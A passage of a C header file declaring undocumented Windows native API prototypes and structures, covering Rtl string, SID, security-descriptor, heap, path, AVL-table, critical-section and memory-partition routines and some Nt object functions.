NTAPI RtlRaiseException( 4702 | _In_ PEXCEPTION_RECORD 4703 | ); 4704 | 4705 | VOID NTAPI RtlPushFrame( 4706 | _In_ PTEB_ACTIVE_FRAME Frame 4707 | ); 4708 | 4709 | VOID NTAPI RtlPopFrame( 4710 | _In_ PTEB_ACTIVE_FRAME Frame 4711 | ); 4712 | 4713 | PTEB_ACTIVE_FRAME NTAPI RtlGetFrame( 4714 | VOID 4715 | ); 4716 | 4717 | BOOLEAN NTAPI RtlCreateUnicodeString( 4718 | _Out_ PUNICODE_STRING DestinationString, 4719 | _In_ PCWSTR SourceString 4720 | ); 4721 | 4722 | VOID NTAPI RtlInitUnicodeString( 4723 | _Inout_ PUNICODE_STRING DestinationString, 4724 | _In_opt_ PCWSTR SourceString 4725 | ); 4726 | 4727 | BOOLEAN NTAPI RtlEqualUnicodeString( 4728 | _In_ PCUNICODE_STRING String1, 4729 | _In_ PCUNICODE_STRING String2, 4730 | _In_ BOOLEAN CaseInSensitive 4731 | ); 4732 | 4733 | BOOLEAN NTAPI RtlPrefixUnicodeString( 4734 | _In_ PCUNICODE_STRING String1, 4735 | _In_ PCUNICODE_STRING String2, 4736 | _In_ BOOLEAN CaseInSensitive 4737 | ); 4738 | 4739 | NTSTATUS NTAPI RtlGetVersion( 4740 | _Inout_ PRTL_OSVERSIONINFOW lpVersionInformation 4741 | ); 4742 | 4743 | ULONG NTAPI RtlNtStatusToDosError( 4744 | _In_ NTSTATUS Status 4745 | ); 4746 | 4747 | NTSTATUS NTAPI RtlGetOwnerSecurityDescriptor( 4748 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, 4749 | _Out_ PSID *Owner, 4750 | _Out_ PBOOLEAN OwnerDefaulted 4751 | ); 4752 | 4753 | NTSTATUS NTAPI RtlGetGroupSecurityDescriptor( 4754 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, 4755 | _Out_ PSID *Group, 4756 | _Out_ PBOOLEAN GroupDefaulted 4757 | ); 4758 | 4759 | NTSTATUS NTAPI RtlGetDaclSecurityDescriptor( 4760 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, 4761 | _Out_ PBOOLEAN DaclPresent, 4762 | _Out_ PACL *Dacl, 4763 | _Out_ PBOOLEAN DaclDefaulted 4764 | ); 4765 | 4766 | NTSTATUS NTAPI RtlGetSaclSecurityDescriptor( 4767 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor, 4768 | _Out_ PBOOLEAN SaclPresent, 4769 | _Out_ PACL *Sacl, 4770 | _Out_ PBOOLEAN SaclDefaulted 4771 | ); 4772 | 4773 | ULONG NTAPI RtlLengthSecurityDescriptor( 4774 | _In_ PSECURITY_DESCRIPTOR SecurityDescriptor 4775 | ); 4776 | 4777 | VOID NTAPI RtlMapGenericMask( 4778 | _In_ PACCESS_MASK AccessMask, 4779 | _In_ PGENERIC_MAPPING GenericMapping 4780 | ); 4781 | 4782 | VOID NTAPI RtlInitString( 4783 | PSTRING DestinationString, 4784 | PCSZ SourceString 4785 | ); 4786 | 4787 | NTSTATUS NTAPI RtlExpandEnvironmentStrings( 4788 | _In_opt_ PVOID Environment, 4789 | _In_reads_(SrcLength) PWSTR Src, 4790 | _In_ SIZE_T SrcLength, 4791 | _Out_writes_opt_(DstLength) PWSTR Dst, 4792 | _In_ SIZE_T DstLength, 4793 | _Out_opt_ PSIZE_T ReturnLength 4794 | ); 4795 | 4796 | NTSTATUS NTAPI RtlExpandEnvironmentStrings_U( 4797 | _In_opt_ PVOID Environment, 4798 | _In_ PCUNICODE_STRING Source, 4799 | _Out_ PUNICODE_STRING Destination, 4800 | _Out_opt_ PULONG ReturnedLength 4801 | ); 4802 | 4803 | VOID NTAPI RtlSetLastWin32Error( 4804 | LONG Win32Error 4805 | ); 4806 | 4807 | NTSTATUS NTAPI RtlWow64EnableFsRedirection( 4808 | _In_ BOOLEAN Wow64FsEnableRedirection 4809 | ); 4810 | 4811 | NTSTATUS NTAPI RtlWow64EnableFsRedirectionEx( 4812 | _In_ PVOID DisableFsRedirection, 4813 | _Out_ PVOID *OldFsRedirectionLevel 4814 | ); 4815 | 4816 | PVOID NTAPI RtlEncodePointer( 4817 | PVOID Ptr 4818 | ); 4819 | 4820 | PVOID NTAPI RtlDecodePointer( 4821 | PVOID Ptr 4822 | ); 4823 | 4824 | typedef NTSTATUS 4825 | (NTAPI * PRTL_HEAP_COMMIT_ROUTINE)( 4826 | IN PVOID Base, 4827 | IN OUT PVOID *CommitAddress, 4828 | IN OUT PSIZE_T CommitSize 4829 | ); 4830 | 4831 | typedef struct _RTL_HEAP_PARAMETERS { 4832 | ULONG Length; 4833 | SIZE_T SegmentReserve; 4834 | SIZE_T SegmentCommit; 4835 | SIZE_T DeCommitFreeBlockThreshold; 4836 | SIZE_T DeCommitTotalFreeThreshold; 4837 | SIZE_T MaximumAllocationSize; 4838 | SIZE_T VirtualMemoryThreshold; 4839 | SIZE_T InitialCommit; 4840 | SIZE_T InitialReserve; 4841 | PRTL_HEAP_COMMIT_ROUTINE CommitRoutine; 4842 | SIZE_T Reserved[2]; 4843 | } RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS; 4844 | 4845 | PVOID NTAPI RtlCreateHeap( 4846 | _In_ ULONG Flags, 4847 | _In_opt_ PVOID HeapBase, 4848 | _In_opt_ SIZE_T ReserveSize, 4849 | _In_opt_ SIZE_T CommitSize, 4850 | _In_opt_ PVOID Lock, 4851 | _In_opt_ PRTL_HEAP_PARAMETERS Parameters 4852 | ); 4853 | 4854 | PVOID NTAPI RtlDestroyHeap( 4855 | _In_ PVOID HeapHandle 4856 | ); 4857 | 4858 | PVOID NTAPI RtlAllocateHeap( 4859 | _In_ PVOID HeapHandle, 4860 | _In_ ULONG Flags, 4861 | _In_ SIZE_T Size 4862 | ); 4863 | 4864 | BOOLEAN NTAPI RtlFreeHeap( 4865 | _In_ PVOID HeapHandle, 4866 | _In_ ULONG Flags, 4867 | _In_ PVOID BaseAddress 4868 | ); 4869 | 4870 | BOOLEAN NTAPI RtlValidSid( 4871 | PSID Sid 4872 | ); 4873 | 4874 | BOOLEAN NTAPI RtlEqualSid( 4875 | PSID Sid1, 4876 | PSID Sid2 4877 | ); 4878 | 4879 | BOOLEAN NTAPI RtlEqualPrefixSid( 4880 | PSID Sid1, 4881 | PSID Sid2 4882 | ); 4883 | 4884 | ULONG NTAPI RtlLengthRequiredSid( 4885 | ULONG SubAuthorityCount 4886 | ); 4887 | 4888 | PVOID NTAPI RtlFreeSid( 4889 | IN PSID Sid 4890 | ); 4891 | 4892 | NTSTATUS NTAPI RtlAllocateAndInitializeSid( 4893 | IN PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, 4894 | IN UCHAR SubAuthorityCount, 4895 | IN ULONG SubAuthority0, 4896 | IN ULONG SubAuthority1, 4897 | IN ULONG SubAuthority2, 4898 | IN ULONG SubAuthority3, 4899 | IN ULONG SubAuthority4, 4900 | IN ULONG SubAuthority5, 4901 | IN ULONG SubAuthority6, 4902 | IN ULONG SubAuthority7, 4903 | OUT PSID *Sid 4904 | ); 4905 | 4906 | NTSTATUS NTAPI RtlInitializeSid( 4907 | PSID Sid, 4908 | PSID_IDENTIFIER_AUTHORITY IdentifierAuthority, 4909 | UCHAR SubAuthorityCount 4910 | ); 4911 | 4912 | PSID_IDENTIFIER_AUTHORITY NTAPI RtlIdentifierAuthoritySid( 4913 | PSID Sid 4914 | ); 4915 | 4916 | PULONG NTAPI RtlSubAuthoritySid( 4917 | PSID Sid, 4918 | ULONG SubAuthority 4919 | ); 4920 | 4921 | PUCHAR NTAPI RtlSubAuthorityCountSid( 4922 | PSID Sid 4923 | ); 4924 | 4925 | ULONG NTAPI RtlLengthSid( 4926 | PSID Sid 4927 | ); 4928 | 4929 | NTSTATUS NTAPI RtlCopySid( 4930 | ULONG DestinationSidLength, 4931 | PSID DestinationSid, 4932 | PSID SourceSid 4933 | ); 4934 | 4935 | NTSTATUS NTAPI RtlCopySidAndAttributesArray( 4936 | ULONG ArrayLength, 4937 | PSID_AND_ATTRIBUTES Source, 4938 | ULONG TargetSidBufferSize, 4939 | PSID_AND_ATTRIBUTES TargetArrayElement, 4940 | PSID TargetSid, 4941 | PSID *NextTargetSid, 4942 | PULONG RemainingTargetSidSize 4943 | ); 4944 | 4945 | NTSTATUS NTAPI RtlLengthSidAsUnicodeString( 4946 | PSID Sid, 4947 | PULONG StringLength 4948 | ); 4949 | 4950 | NTSTATUS NTAPI RtlConvertSidToUnicodeString( 4951 | PUNICODE_STRING UnicodeString, 4952 | PSID Sid, 4953 | BOOLEAN AllocateDestinationString 4954 | ); 4955 | 4956 | NTSTATUS NTAPI RtlCreateSecurityDescriptor( 4957 | PSECURITY_DESCRIPTOR SecurityDescriptor, 4958 | ULONG Revision 4959 | ); 4960 | 4961 | NTSTATUS NTAPI RtlSetOwnerSecurityDescriptor( 4962 | PSECURITY_DESCRIPTOR SecurityDescriptor, 4963 | PSID Owner, 4964 | BOOLEAN OwnerDefaulted 4965 | ); 4966 | 4967 | FORCEINLINE LUID 4968 | NTAPI 4969 | RtlConvertLongToLuid( 4970 | LONG Long 4971 | ) 4972 | { 4973 | LUID TempLuid; 4974 | LARGE_INTEGER TempLi; 4975 | 4976 | TempLi.QuadPart = Long; 4977 | TempLuid.LowPart = TempLi.LowPart; 4978 | TempLuid.HighPart = TempLi.HighPart; 4979 | return(TempLuid); 4980 | } 4981 | 4982 | NTSTATUS NTAPI RtlFormatCurrentUserKeyPath( 4983 | _Out_ PUNICODE_STRING CurrentUserKeyPath 4984 | ); 4985 | 4986 | VOID NTAPI RtlFreeUnicodeString( 4987 | PUNICODE_STRING UnicodeString 4988 | ); 4989 | 4990 | VOID NTAPI RtlFreeAnsiString( 4991 | PANSI_STRING AnsiString 4992 | ); 4993 | 4994 | NTSTATUS NTAPI RtlAnsiStringToUnicodeString( 4995 | PUNICODE_STRING DestinationString, 4996 | PCANSI_STRING SourceString, 4997 | BOOLEAN AllocateDestinationString 4998 | ); 4999 | 5000 | BOOLEAN NTAPI RtlDosPathNameToNtPathName_U( 5001 | _In_ PCWSTR DosFileName, 5002 | _Out_ PUNICODE_STRING NtFileName, 5003 | _Out_opt_ PWSTR *FilePart, 5004 | PVOID Reserved 5005 | ); 5006 | 5007 | NTSTATUS NTAPI RtlGetCompressionWorkSpaceSize( 5008 | _In_ USHORT CompressionFormatAndEngine, 5009 | _Out_ PULONG CompressBufferWorkSpaceSize, 5010 | _Out_ PULONG CompressFragmentWorkSpaceSize 5011 | ); 5012 | 5013 | NTSTATUS NTAPI RtlCompressBuffer( 5014 | _In_ USHORT CompressionFormatAndEngine, 5015 | _In_ PUCHAR UncompressedBuffer, 5016 | _In_ ULONG UncompressedBufferSize, 5017 | _Out_ PUCHAR CompressedBuffer, 5018 | _In_ ULONG CompressedBufferSize, 5019 | _In_ ULONG UncompressedChunkSize, 5020 | _Out_ PULONG FinalCompressedSize, 5021 | _In_ PVOID WorkSpace 5022 | ); 5023 | 5024 | NTSTATUS NTAPI RtlDecompressBuffer( 5025 | _In_ USHORT CompressionFormat, 5026 | _Out_ PUCHAR UncompressedBuffer, 5027 | _In_ ULONG UncompressedBufferSize, 5028 | _In_ PUCHAR CompressedBuffer, 5029 | _In_ ULONG CompressedBufferSize, 5030 | _Out_ PULONG FinalUncompressedSize 5031 | ); 5032 | 5033 | PIMAGE_NT_HEADERS NTAPI RtlImageNtHeader( 5034 | _In_ PVOID Base 5035 | ); 5036 | 5037 | NTSYSAPI PVOID NTAPI RtlAddressInSectionTable( 5038 | _In_ PIMAGE_NT_HEADERS NtHeaders, 5039 | _In_ PVOID BaseOfImage, 5040 | _In_ ULONG VirtualAddress 5041 | ); 5042 | 5043 | PVOID NTAPI RtlImageDirectoryEntryToData( 5044 | PVOID BaseOfImage, 5045 | BOOLEAN MappedAsImage, 5046 | USHORT DirectoryEntry, 5047 | PULONG Size 5048 | ); 5049 | 5050 | VOID NTAPI RtlSecondsSince1970ToTime( 5051 | ULONG ElapsedSeconds, 5052 | PLARGE_INTEGER Time 5053 | ); 5054 | 5055 | VOID NTAPI RtlSecondsSince1980ToTime( 5056 | ULONG ElapsedSeconds, 5057 | PLARGE_INTEGER Time 5058 | ); 5059 | 5060 | BOOLEAN NTAPI RtlTimeToSecondsSince1980( 5061 | PLARGE_INTEGER Time, 5062 | PULONG ElapsedSeconds 5063 | ); 5064 | 5065 | VOID NTAPI RtlTimeToTimeFields( 5066 | _Inout_ PLARGE_INTEGER Time, 5067 | _Inout_ PTIME_FIELDS TimeFields 5068 | ); 5069 | 5070 | BOOLEAN NTAPI RtlTimeFieldsToTime( 5071 | PTIME_FIELDS TimeFields, 5072 | PLARGE_INTEGER Time 5073 | ); 5074 | 5075 | ULONG32 NTAPI RtlComputeCrc32( 5076 | _In_ ULONG32 PartialCrc, 5077 | _In_ PVOID Buffer, 5078 | _In_ ULONG Length 5079 | ); 5080 | 5081 | VOID NTAPI RtlGetNtVersionNumbers( 5082 | _Out_opt_ PULONG MajorVersion, 5083 | _Out_opt_ PULONG MinorVersion, 5084 | _Out_opt_ PULONG BuildNumber 5085 | ); 5086 | 5087 | PPEB NTAPI RtlGetCurrentPeb( 5088 | VOID 5089 | ); 5090 | 5091 | PWSTR NTAPI RtlIpv4AddressToStringW( 5092 | __in const struct in_addr *Addr, 5093 | __out_ecount(16) PWSTR S 5094 | ); 5095 | 5096 | NTSTATUS NTAPI RtlAdjustPrivilege( 5097 | ULONG Privilege, 5098 | BOOLEAN Enable, 5099 | BOOLEAN Client, 5100 | PBOOLEAN WasEnabled 5101 | ); 5102 | 5103 | // 5104 | // preallocated heap-growable buffers 5105 | // 5106 | typedef struct _RTL_BUFFER { 5107 | PUCHAR Buffer; 5108 | PUCHAR StaticBuffer; 5109 | SIZE_T Size; 5110 | SIZE_T StaticSize; 5111 | SIZE_T ReservedForAllocatedSize; // for future doubling 5112 | PVOID ReservedForIMalloc; // for future pluggable growth 5113 | } RTL_BUFFER, *PRTL_BUFFER; 5114 | 5115 | typedef struct _RTL_UNICODE_STRING_BUFFER { 5116 | UNICODE_STRING String; 5117 | RTL_BUFFER ByteBuffer; 5118 | UCHAR MinimumStaticBufferForTerminalNul[sizeof(WCHAR)]; 5119 | } RTL_UNICODE_STRING_BUFFER, *PRTL_UNICODE_STRING_BUFFER; 5120 | 5121 | NTSTATUS NTAPI RtlNtPathNameToDosPathName( 5122 | _In_ ULONG Flags, 5123 | _Inout_ PRTL_UNICODE_STRING_BUFFER Path, 5124 | _Out_opt_ PULONG Disposition, 5125 | _Inout_opt_ PWSTR* FilePart 5126 | ); 5127 | 5128 | ULONG NTAPI RtlIsDosDeviceName_U( 5129 | PCWSTR DosFileName 5130 | ); 5131 | 5132 | ULONG NTAPI RtlGetFullPathName_U( 5133 | __in PCWSTR lpFileName, 5134 | __in ULONG nBufferLength, 5135 | __out_bcount(nBufferLength) PWSTR lpBuffer, 5136 | __out_opt PWSTR *lpFilePart 5137 | ); 5138 | 5139 | typedef enum _RTL_PATH_TYPE { 5140 | RtlPathTypeUnknown, // 0 5141 | RtlPathTypeUncAbsolute, // 1 5142 | RtlPathTypeDriveAbsolute, // 2 5143 | RtlPathTypeDriveRelative, // 3 5144 | RtlPathTypeRooted, // 4 5145 | RtlPathTypeRelative, // 5 5146 | RtlPathTypeLocalDevice, // 6 5147 | RtlPathTypeRootLocalDevice // 7 5148 | } RTL_PATH_TYPE; 5149 | 5150 | RTL_PATH_TYPE NTAPI RtlDetermineDosPathNameType_U( 5151 | PCWSTR DosFileName 5152 | ); 5153 | 5154 | #define HASH_STRING_ALGORITHM_DEFAULT (0) 5155 | #define HASH_STRING_ALGORITHM_X65599 (1) 5156 | #define HASH_STRING_ALGORITHM_INVALID (0xffffffff) 5157 | 5158 | NTSTATUS NTAPI RtlHashUnicodeString( 5159 | _In_ const UNICODE_STRING *String, 5160 | _In_ BOOLEAN CaseInSensitive, 5161 | _In_ ULONG HashAlgorithm, 5162 | _Out_ PULONG HashValue 5163 | ); 5164 | 5165 | ULONG DbgPrint( 5166 | _In_ PCH Format, 5167 | ... 5168 | ); 5169 | 5170 | /* 5171 | ** Runtime Library API END 5172 | */ 5173 | 5174 | /* 5175 | ** Generic AVL API START 5176 | */ 5177 | typedef ULONG CLONG; 5178 | 5179 | typedef enum _TABLE_SEARCH_RESULT { 5180 | TableEmptyTree, 5181 | TableFoundNode, 5182 | TableInsertAsLeft, 5183 | TableInsertAsRight 5184 | } TABLE_SEARCH_RESULT; 5185 | 5186 | typedef enum _RTL_GENERIC_COMPARE_RESULTS { 5187 | GenericLessThan, 5188 | GenericGreaterThan, 5189 | GenericEqual 5190 | } RTL_GENERIC_COMPARE_RESULTS; 5191 | 5192 | //typedef struct _RTL_AVL_TABLE RTL_AVL_TABLE; 5193 | //typedef struct PRTL_AVL_TABLE *_RTL_AVL_TABLE; 5194 | 5195 | typedef struct _RTL_BALANCED_LINKS { 5196 | struct _RTL_BALANCED_LINKS *Parent; 5197 | struct _RTL_BALANCED_LINKS *LeftChild; 5198 | struct _RTL_BALANCED_LINKS *RightChild; 5199 | CHAR Balance; 5200 | UCHAR Reserved[3]; 5201 | } RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS; 5202 | 5203 | typedef struct _RTL_AVL_TABLE { 5204 | RTL_BALANCED_LINKS BalancedRoot; 5205 | PVOID OrderedPointer; 5206 | ULONG WhichOrderedElement; 5207 | ULONG NumberGenericTableElements; 5208 | ULONG DepthOfTree; 5209 | PRTL_BALANCED_LINKS RestartKey; 5210 | ULONG DeleteCount; 5211 | FARPROC CompareRoutine; 5212 | FARPROC AllocateRoutine; 5213 | FARPROC FreeRoutine; 5214 | PVOID TableContext; 5215 | } RTL_AVL_TABLE, *PRTL_AVL_TABLE; 5216 | 5217 | 5218 | typedef RTL_GENERIC_COMPARE_RESULTS(NTAPI *PRTL_AVL_COMPARE_ROUTINE)( 5219 | _In_ _RTL_AVL_TABLE *Table, 5220 | _In_ PVOID FirstStruct, 5221 | _In_ PVOID SecondStruct 5222 | ); 5223 | 5224 | typedef PVOID(NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)( 5225 | _In_ _RTL_AVL_TABLE *Table, 5226 | _In_ ULONG ByteSize 5227 | ); 5228 | 5229 | typedef VOID(NTAPI *PRTL_AVL_FREE_ROUTINE)( 5230 | _In_ _RTL_AVL_TABLE *Table, 5231 | _In_ _Post_invalid_ PVOID Buffer 5232 | ); 5233 | 5234 | typedef NTSTATUS(NTAPI *PRTL_AVL_MATCH_FUNCTION)( 5235 | _In_ _RTL_AVL_TABLE *Table, 5236 | _In_ PVOID UserData, 5237 | _In_ PVOID MatchData 5238 | ); 5239 | 5240 | VOID NTAPI RtlInitializeGenericTableAvl( 5241 | _Out_ PRTL_AVL_TABLE Table, 5242 | _In_ PRTL_AVL_COMPARE_ROUTINE CompareRoutine, 5243 | _In_ PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine, 5244 | _In_ PRTL_AVL_FREE_ROUTINE FreeRoutine, 5245 | _In_opt_ PVOID TableContext 5246 | ); 5247 | 5248 | PVOID NTAPI RtlInsertElementGenericTableAvl( 5249 | _In_ PRTL_AVL_TABLE Table, 5250 | _In_reads_bytes_(BufferSize) PVOID Buffer, 5251 | _In_ CLONG BufferSize, 5252 | _Out_opt_ PBOOLEAN NewElement 5253 | ); 5254 | 5255 | PVOID NTAPI RtlInsertElementGenericTableFullAvl( 5256 | _In_ PRTL_AVL_TABLE Table, 5257 | _In_reads_bytes_(BufferSize) PVOID Buffer, 5258 | _In_ CLONG BufferSize, 5259 | _Out_opt_ PBOOLEAN NewElement, 5260 | _In_ PVOID NodeOrParent, 5261 | _In_ TABLE_SEARCH_RESULT SearchResult 5262 | ); 5263 | 5264 | BOOLEAN NTAPI RtlDeleteElementGenericTableAvl( 5265 | _In_ PRTL_AVL_TABLE Table, 5266 | _In_ PVOID Buffer 5267 | ); 5268 | 5269 | PVOID NTAPI RtlLookupElementGenericTableAvl( 5270 | _In_ PRTL_AVL_TABLE Table, 5271 | _In_ PVOID Buffer 5272 | ); 5273 | 5274 | PVOID NTAPI RtlLookupElementGenericTableFullAvl( 5275 | _In_ PRTL_AVL_TABLE Table, 5276 | _In_ PVOID Buffer, 5277 | _Out_ PVOID *NodeOrParent, 5278 | _Out_ TABLE_SEARCH_RESULT *SearchResult 5279 | ); 5280 | 5281 | PVOID NTAPI RtlEnumerateGenericTableAvl( 5282 | _In_ PRTL_AVL_TABLE Table, 5283 | _In_ BOOLEAN Restart 5284 | ); 5285 | 5286 | PVOID NTAPI RtlEnumerateGenericTableWithoutSplayingAvl( 5287 | _In_ PRTL_AVL_TABLE Table, 5288 | _Inout_ PVOID *RestartKey 5289 | ); 5290 | 5291 | PVOID NTAPI RtlLookupFirstMatchingElementGenericTableAvl( 5292 | _In_ PRTL_AVL_TABLE Table, 5293 | _In_ PVOID Buffer, 5294 | _Out_ PVOID *RestartKey 5295 | ); 5296 | 5297 | PVOID NTAPI RtlEnumerateGenericTableLikeADirectory( 5298 | _In_ PRTL_AVL_TABLE Table, 5299 | _In_opt_ PRTL_AVL_MATCH_FUNCTION MatchFunction, 5300 | _In_opt_ PVOID MatchData, 5301 | _In_ ULONG NextFlag, 5302 | _Inout_ PVOID *RestartKey, 5303 | _Inout_ PULONG DeleteCount, 5304 | _In_ PVOID Buffer 5305 | ); 5306 | 5307 | PVOID NTAPI RtlGetElementGenericTableAvl( 5308 | _In_ PRTL_AVL_TABLE Table, 5309 | _In_ ULONG I 5310 | ); 5311 | 5312 | ULONG NTAPI RtlNumberGenericTableElementsAvl( 5313 | _In_ PRTL_AVL_TABLE Table 5314 | ); 5315 | 5316 | BOOLEAN NTAPI RtlIsGenericTableEmptyAvl( 5317 | _In_ PRTL_AVL_TABLE Table 5318 | ); 5319 | 5320 | /* 5321 | ** Generic Avl END 5322 | */ 5323 | 5324 | /* 5325 | ** Critical Section START 5326 | */ 5327 | #define LOGICAL ULONG 5328 | 5329 | NTSTATUS NTAPI RtlEnterCriticalSection( 5330 | PRTL_CRITICAL_SECTION CriticalSection 5331 | ); 5332 | 5333 | NTSTATUS NTAPI RtlLeaveCriticalSection( 5334 | PRTL_CRITICAL_SECTION CriticalSection 5335 | ); 5336 | 5337 | LOGICAL NTAPI RtlIsCriticalSectionLocked( 5338 | IN PRTL_CRITICAL_SECTION CriticalSection 5339 | ); 5340 | 5341 | LOGICAL NTAPI RtlIsCriticalSectionLockedByThread( 5342 | IN PRTL_CRITICAL_SECTION CriticalSection 5343 | ); 5344 | 5345 | ULONG NTAPI RtlGetCriticalSectionRecursionCount( 5346 | IN PRTL_CRITICAL_SECTION CriticalSection 5347 | ); 5348 | 5349 | LOGICAL NTAPI RtlTryEnterCriticalSection( 5350 | PRTL_CRITICAL_SECTION CriticalSection 5351 | ); 5352 | 5353 | NTSTATUS NTAPI RtlInitializeCriticalSection( 5354 | PRTL_CRITICAL_SECTION CriticalSection 5355 | ); 5356 | 5357 | VOID NTAPI RtlEnableEarlyCriticalSectionEventCreation( 5358 | VOID 5359 | ); 5360 | 5361 | NTSTATUS NTAPI RtlInitializeCriticalSectionAndSpinCount( 5362 | PRTL_CRITICAL_SECTION CriticalSection, 5363 | ULONG SpinCount 5364 | ); 5365 | 5366 | ULONG NTAPI RtlSetCriticalSectionSpinCount( 5367 | PRTL_CRITICAL_SECTION CriticalSection, 5368 | ULONG SpinCount 5369 | ); 5370 | 5371 | NTSTATUS NTAPI RtlDeleteCriticalSection( 5372 | PRTL_CRITICAL_SECTION CriticalSection 5373 | ); 5374 | 5375 | /* 5376 | ** Critical Section END 5377 | */ 5378 | 5379 | /* 5380 | ** UAC Elevation Start 5381 | */ 5382 | 5383 | #define DBG_FLAG_ELEVATION_ENABLED 1 5384 | #define DBG_FLAG_VIRTUALIZATION_ENABLED 2 5385 | #define DBG_FLAG_INSTALLER_DETECT_ENABLED 3 5386 | 5387 | NTSTATUS NTAPI RtlQueryElevationFlags( 5388 | _Inout_ ULONG *ElevationFlags 5389 | ); 5390 | 5391 | /* 5392 | ** UAC Elevation END 5393 | */ 5394 | 5395 | 5396 | /* 5397 | * Memory parition START 5398 | */ 5399 | 5400 | typedef enum _MEMORY_PARTITION_INFORMATION_CLASS { 5401 | SystemMemoryPartitionInformation, 5402 | SystemMemoryPartitionMoveMemory, 5403 | SystemMemoryPartitionAddPagefile, 5404 | SystemMemoryPartitionCombineMemory, 5405 | SystemMemoryPartitionInitialAddMemory 5406 | } MEMORY_PARTITION_INFORMATION_CLASS; 5407 | 5408 | typedef struct _MEMORY_PARTITION_PAGE_RANGE { 5409 | ULONG_PTR StartPage; 5410 | ULONG_PTR NumberOfPages; 5411 | } MEMORY_PARTITION_PAGE_RANGE, *PMEMORY_PARTITION_PAGE_RANGE; 5412 | 5413 | typedef struct _MEMORY_PARTITION_INITIAL_ADD_INFORMATION { 5414 | ULONG Flags; 5415 | ULONG NumberOfRanges; 5416 | ULONG_PTR NumberOfPagesAdded; 5417 | MEMORY_PARTITION_PAGE_RANGE PartitionRanges[1]; 5418 | } MEMORY_PARTITION_INITIAL_ADD_INFORMATION, *PMEMORY_PARTITION_INITIAL_ADD_INFORMATION; 5419 | 5420 | typedef struct _MEMORY_PARTITION_PAGE_COMBINE_INFORMATION { 5421 | PVOID StopHandle; 5422 | ULONG Flags; 5423 | ULONG_PTR TotalNumberOfPages; 5424 | } MEMORY_PARTITION_PAGE_COMBINE_INFORMATION, *PMEMORY_PARTITION_PAGE_COMBINE_INFORMATION; 5425 | 5426 | typedef struct _MEMORY_PARTITION_PAGEFILE_INFORMATION { 5427 | UNICODE_STRING PageFileName; 5428 | LARGE_INTEGER MinimumSize; 5429 | LARGE_INTEGER MaximumSize; 5430 | ULONG Flags; 5431 | } MEMORY_PARTITION_PAGEFILE_INFORMATION, *PMEMORY_PARTITION_PAGEFILE_INFORMATION; 5432 | 5433 | typedef struct _MEMORY_PARTITION_TRANSFER_INFORMATION { 5434 | ULONG_PTR NumberOfPages; 5435 | ULONG NumaNode; 5436 | ULONG Flags; 5437 | } MEMORY_PARTITION_TRANSFER_INFORMATION, *PMEMORY_PARTITION_TRANSFER_INFORMATION; 5438 | 5439 | typedef struct _MEMORY_PARTITION_CONFIGURATION_INFORMATION { 5440 | ULONG Flags; 5441 | ULONG NumaNode; 5442 | ULONG Channel; 5443 | ULONG NumberOfNumaNodes; 5444 | ULONG_PTR ResidentAvailablePages; 5445 | ULONG_PTR CommittedPages; 5446 | ULONG_PTR CommitLimit; 5447 | ULONG_PTR PeakCommitment; 5448 | ULONG_PTR TotalNumberOfPages; 5449 | ULONG_PTR AvailablePages; 5450 | ULONG_PTR ZeroPages; 5451 | ULONG_PTR FreePages; 5452 | ULONG_PTR StandbyPages; 5453 | } MEMORY_PARTITION_CONFIGURATION_INFORMATION, *PMEMORY_PARTITION_CONFIGURATION_INFORMATION; 5454 | 5455 | NTSTATUS NTAPI NtOpenPartition( 5456 | _Out_ PHANDLE PartitionHandle, 5457 | _In_ ACCESS_MASK DesiredAccess, 5458 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5459 | ); 5460 | 5461 | NTSTATUS NTAPI NtManagePartition( 5462 | _In_ HANDLE TargetHandle, 5463 | _In_ HANDLE SourceHandle, 5464 | _In_ MEMORY_PARTITION_INFORMATION_CLASS PartitionInformationClass, 5465 | _Inout_ PVOID PartitionInformation, 5466 | _In_ SIZE_T PartitionInformationLength 5467 | ); 5468 | 5469 | NTSTATUS NTAPI NtCreatePartition( 5470 | _Out_ PHANDLE PartitionHandle, 5471 | _In_ ACCESS_MASK DesiredAccess, 5472 | _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes, 5473 | _In_ ULONG PreferredNode 5474 | ); 5475 | 5476 | /* 5477 | * Memory partition END 5478 | */ 5479 | 5480 | /* 5481 | ** Native API START 5482 | */ 5483 | 5484 | NTSTATUS NTAPI NtClose( 5485 | _In_ HANDLE Handle 5486 | ); 5487 | 5488 | NTSTATUS NTAPI NtCreateDirectoryObject( 5489 | _Out_ PHANDLE DirectoryHandle, 5490 | _In_ ACCESS_MASK DesiredAccess, 5491 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5492 | ); 5493 | 5494 | NTSTATUS NTAPI NtCreateDirectoryObjectEx( 5495 | _Out_ PHANDLE DirectoryHandle, 5496 | _In_ ACCESS_MASK DesiredAccess, 5497 | _In_ POBJECT_ATTRIBUTES ObjectAttributes, 5498 | _In_ HANDLE ShadowDirectoryHandle, 5499 | _In_ ULONG Flags 5500 | ); 5501 | 5502 | NTSTATUS NTAPI NtOpenDirectoryObject( 5503 | _Out_ PHANDLE DirectoryHandle, 5504 | _In_ ACCESS_MASK DesiredAccess, 5505 | _In_ POBJECT_ATTRIBUTES ObjectAttributes 5506 | ); 5507 | 5508 | NTSTATUS NTAPI NtQueryDirectoryObject( 5509 | _In_ HANDLE DirectoryHandle, 5510 | _Out_opt_ PVOID Buffer, 5511 | _In_ ULONG Length, 5512 | _In_ BOOLEAN ReturnSingleEntry, 5513 | _In_ BOOLEAN RestartScan, 5514 | _Inout_ PULONG Context, 5515 | PULONG ReturnLength 5516 | ); 5517 | 5518 | NTSTATUS NTAPI NtQueryObject( 5519 | _In_opt_ HANDLE Handle, 5520 | _In_ OBJECT_INFORMATION_CLASS ObjectInformationClass, 5521 | _Out_opt_ PVOID ObjectInformation, 5522 | _In_ ULONG ObjectInformationLength, 5523 | _Out_opt_ PULONG ReturnLength 5524 | ); 5525 | 5526 | NTSTATUS WINAPI NtQuerySystemInformation( 5527 | _In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, 